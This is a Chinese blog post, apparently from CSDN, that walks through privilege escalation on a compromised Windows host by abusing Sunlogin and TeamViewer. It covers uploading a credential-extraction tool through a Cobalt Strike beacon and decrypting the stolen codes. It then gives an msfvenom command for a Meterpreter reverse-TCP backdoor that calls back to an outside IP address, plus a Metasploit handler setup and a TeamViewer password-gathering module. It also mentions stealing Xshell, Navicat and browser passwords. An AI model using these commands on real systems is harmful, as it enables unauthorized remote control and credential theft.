Windows提权:第三方应用

最新推荐文章于 2024-05-12 17:30:39 发布
最新推荐文章于 2024-05-12 17:30:39 发布
阅读量399 收藏 10
点赞数 7
分类专栏: 内网渗透 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61553520/article/details/131428828
版权
本文讲述了利用向日葵和Teamviewer中的漏洞进行提权的过程,包括获取webshell权限,通过Beacon工具获取验证码,以及使用Metasploit框架创建后门。还提及了Xshell和Navicat等其他软件的密码抓取方法。
摘要由CSDN通过智能技术生成

目录

向日葵漏洞提权

Teamviewer提权

电脑(服务器)装的第三方应用越多,安全隐患越大

向日葵漏洞提权

已经拿到了webshell权限,这里的权限是普通用户的权限,查看服务进程

tasklist /svc

发现对方主机上存在向日葵的进程 

将其上线CS上,尝试通过CS抓取向日葵密码

上传工具到对方服务器

通过beacon执行工具

得到机器密文,这就是验证码,使用脚本解密

GitHub - wafinfo/Sunflower_get_Password: 一款针对向日葵的识别码和验证码提取工具

接下来可以使用向日葵远控软件直接连接靶机,向日葵的权限往往是高权限

Teamviewer提权

后门上线权限必须是管理员权限,低权限用户不能获取

上线MSF

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.130.42 LPORT=3333 -f exe -o msf.exe   #生成后门
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run

通过MSF模块获得passwd

run post/windows/gather/credentials/teamviewer_passwords

 密码一致,为uaq123

CS也有相关的插件可以利用

 还有比如:Xshell Navicat 浏览器的密码都可以通过CS进行抓取

Dao-道法自然
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Windows提权---第三方软件提权、Bypass UAC提权
qq_40012781的博客
07-03 1811
第三方软件提权、Bypass UAC提权
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1120
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
Linux提权--第三方软件MYSQL数据库提权(WEB+本地)
最新发布
金灰的博客
05-12 887
免责声明:本文仅做技术交流与学习,非法搞事后果自负...
第三方应用软件提权方法
m0_62207482的博客
03-09 352
3、Gene6 FTP 安全性测试(Gene6 FTP 默认安装路径是 C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini 其中 Remote.ini 是主配置文件,管理员登录的 ip、端口和密码都存储在这。2、FlashFXP 安全性测试(攻击者只需通过 webshell 下载 quick.dat、sites.dat、stats.dat这三个文件进行本地替换,就可以用星号查看器直接查看连接密 码)9、服务替换安全性测试。8、启动项安全性测试。
第三方提权
一个普普通通的博客
04-17 2000
第三方提权 可以进入注册表查看装了哪些软件 搜狗输入法提权 原理:通过搜狗输入法的权限不严格,在默认安装搜狗输入法时,权限赋予过大,everyone(所有)权限(绝对控制) 通过伪造exe文件,例如更新程序,在对方进行软件更新或内容更新时,自动执行提前写好的bat脚本(quick batch) FileZilla、ftp、迅雷、搜狗输入法、vnc、老版本360等第三方软件的特别版本均存在此提权方法 LPK劫持(dll劫持) 一种是需要程序本身的dll,根据函数仿制一个dll 另一种是直接生成一个恶意dl
3389_3389_3389自动打开_远程控制_提权_
10-03
然而,这也意味着如果未经授权的第三方能够访问3389端口,就可能对系统造成安全威胁,因此,确保远程桌面的安全性至关重要。 "提权"一词在网络安全中指的是攻击者获取系统更高的权限,例如从普通用户权限升级到管理...
无net添加用户提权
09-13
在这种情况下,"无net提权工具"可能是一个第三方软件或者是一个利用了系统漏洞的exploit(利用程序)。这些工具或exploits可能通过API调用、注册表修改或其他系统接口直接与操作系统交互,以创建用户账户并赋予高...
MS10-048 windows本地提权 32位、64位EXP
03-04
系统管理员应当及时应用官方发布的安全更新,避免使用未经验证的第三方EXP,并保持对网络安全动态的关注,以防止此类漏洞被恶意利用。同时,用户应避免打开来源不明的文件,尤其是TrueType字体文件,以减少潜在的...
windows2003 oday
06-10
对于不再受支持的操作系统,可以考虑采用第三方安全解决方案或加强网络隔离。同时,定期进行安全审计和监控,以及部署入侵检测和预防系统也是必要的。此外,限制不必要的服务和端口,以及采用强密码策略,可以帮助...
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权、Redis数据库权限提升、PostgreSQL数据库权限提升以及Windows系统的令牌窃取和进程注入...
利用第三方软件提权
cxrpty的博客
03-12 1220
实验环境:windows2008 实验步骤: 一、搭建环境 1.关闭防火墙,在wwwroot写入yjh.aspx,密码为-7 2.用菜刀连接 二、实验操作 1.查看当前系统上所运行的软件:tasklist,可看是否运行了Filezilla server 2.用菜刀上传端口转发工具lcx.exe到temp文件夹 2.进行端口转发:lcx.exe -tran 14141127...
hackmap-[windows权限提升(windows提权思路)]
m0_43405474的博客
04-09 4852
hackmap-[windows权限提升{windows提权思路}]1.前言1.1.提权分类水平权限提升(越权)垂直权限提升1.2 windows提权概述2.windows基于WebShell提权2.1 前言2.1.1 asp大马 vs aspx大马(windows2003+IIS)1)asp大马2)aspx大马3)小结2.1.2 基于系统漏洞提权1)信息收集2)漏洞补丁对照表3)提权过程3.实战3.1针对2003 KB952004 提权实验step1:利用aspx大马进行信息搜集——补丁安装情况step2
提权的几种方法
qq_54030686的博客
11-21 3515
提权的几种方法 本文主要介绍几种提权方法的原理以及对应工具脚本的使用 windows 主要分为 系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、窃取令牌提权、bypassuac提权第三方软件/服务提权WEB中间件漏洞提权等。 系统内核溢出提权(例如:巴西烤肉等) 使用systeminfo查看系统的补丁 使用未打补丁的exp进行攻击 wmic qfe get Caption,Description,HotFixID,InstalledOn 使用此条命令即可查看本机安装的补丁 也可以
第三方软件 vnc提权
weixin_30685029的博客
05-20 179
通过读取注册表十进制数 将得出的十进制数去掉第一个数其他转换成16进制 破解16进制数得到密码 vncx.exe -W 回车 输入16进制数 连接vnc 读取 vncx4.exe -w 8个数 自动破解密码 让后工具连接 转载于:https://www.cnblogs.com/feizianquan/p/10892049.html...
提权系列(一)----Windows Service 服务器提权初识与exp提权,mysql提权
热门推荐
fendo
03-29 2万+
一、 二、Windwos常见提权
一文了解提权:溢出提权第三方组件提权
闵行小鱼塘
05-04 2106
提权做个归纳,提权一般分为两种——溢出提权第三方组件提权
向日葵RCE(CNVD-2022-10270/CNVD-2022-03672)
我了解豹女就像农民伯伯了解大米
03-19 1225
目录 漏洞描述: 工具复现: CS服务器上线:(失败) 漏洞描述: 上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。 影响版本: 向日葵个人版 for Windows <= 11.0.0.33 向日葵简约版 <= V1.0.1.43315(2021.12) 工具复现: 同一局域网: 攻击机:172.5
内网渗透之向日葵帮我干掉了杀软
MachineGunJoe666
05-20 2243
最近在某地方举行攻防演练的时候进入后台管理拿到了一个 webshell,但是tasklist /svc查看进程 360、电脑管家赫然在列,我的小伙伴本来准备使用注入 dll 来达到上线 cs 多人运动的效果,但是奈何中间出了点差错始终上不了线,机缘巧合之下发现被控主机有一个SunloginClient.exe进程,于是便有了下文。 0x01 初探 进入后台的过程就不说了,这里上传了一个 asp 大马进入到对方主机,whoami 一看一个 user 权限 然后一发tasklist /...
亚马逊云存储AWS S3第三方应用实践与评测
"该文档是关于第三方应用如何与亚马逊云存储AWS S3集成的深入研究,包括各种操作系统如Linux和Windows环境下挂载S3的方法,以及性能测试和工具的使用,如Eclipse的AWS开发工具包,Visual Studio的AWSToolkit,以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值